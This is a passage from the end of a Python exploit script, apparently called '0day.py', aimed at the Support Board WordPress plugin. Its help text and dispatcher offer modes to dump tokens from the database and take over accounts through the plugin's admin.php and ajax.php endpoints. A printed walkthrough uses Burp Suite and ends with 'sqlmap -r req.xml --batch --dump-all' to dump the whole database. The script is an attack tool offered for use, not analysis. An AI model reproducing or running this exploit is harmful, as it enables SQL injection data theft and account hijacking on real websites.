manual : Generate request.xml file for sqlmap to takeover
token_dump : Dump Available Tokens in the Database (Use this Before running account_takeover)
account_takeover : Take over the account
burpsuite : Show Manual exploitation Using Burp Suite and SQLMap
Required Arguments:
-u, --url : The URL of the Vulnerable site
-p, --path : The Path of the Vulnerable file
Usage: python3 0day.py -u -p
Example : python3 0day.py normal -u https://example.com -p /wp-content/plugins/supportboard/supportboard/admin.php
""")
def exploit_manual():
print(red + "[!]" + white +" To Exploit Using BurpSuite and SQLMap\n")
print(red + "[!]" + white + " 1. Go the the Vulnerable Website Example https://example.com/wp-content/plugins/supportboard/supportboard/admin.php\n")
print(red + "[!]" + white + " 2. Intercept the request as you Try to Login even just put test on Email and Password\n")
print(red + "[!]" + white + " 3. Now Transfer it to repeater and Send\n")
print(red + "[!]" + white + " 4. Save the request and Use SQL Map To Automate the process\n")
print(red + "[!]" + white + " 5. sqlmap -r req.xml --batch --dump-all\n")
if __name__ == "__main__":
clear()
if sys.argv[1] in ["-h", "--help", "--h"]:
help()
elif sys.argv[1] == "normal" and sys.argv[2] in ["-u", "--url"] and sys.argv[4] in ["-p", "--path"]:
url = "{0}{1}".format(sys.argv[3], sys.argv[5])
url = url.replace("admin.php", "include/ajax.php")
url = "{0}".format(url)
main(url)
elif sys.argv[1] == "manual" and sys.argv[2] in ["-u", "--url"] and sys.argv[4] in ["-p", "--path"]:
temp_admin_path = "{0}".format(sys.argv[5])
temp_ajax_path = "{0}".format(sys.argv[5])
temp_ajax_path = temp_ajax_path.replace("admin.php", "include/ajax.php")
manual(sys.argv[3], temp_admin_path, temp_ajax_path)
elif sys.argv[1] in ["token_dump"] and sys.argv[2] in ["-u", "--url"] and sys.argv[4] in ["-p", "--path"]:
dump_token = exploit()
dump_token.get_tokens(sys.argv[3], sys.argv[5])
elif sys.argv[1] in ["account_takeover"] and sys.argv[2] in ["-u", "--url"] and sys.argv[4] in ["-p", "--path"]:
token = str(input("Token: "))
take_over_get(sys.argv[3], sys.argv[5], token)
elif sys.argv[1] == "burpsuite":
exploit_manual()
else:
clear()
help()
sys.exit(0)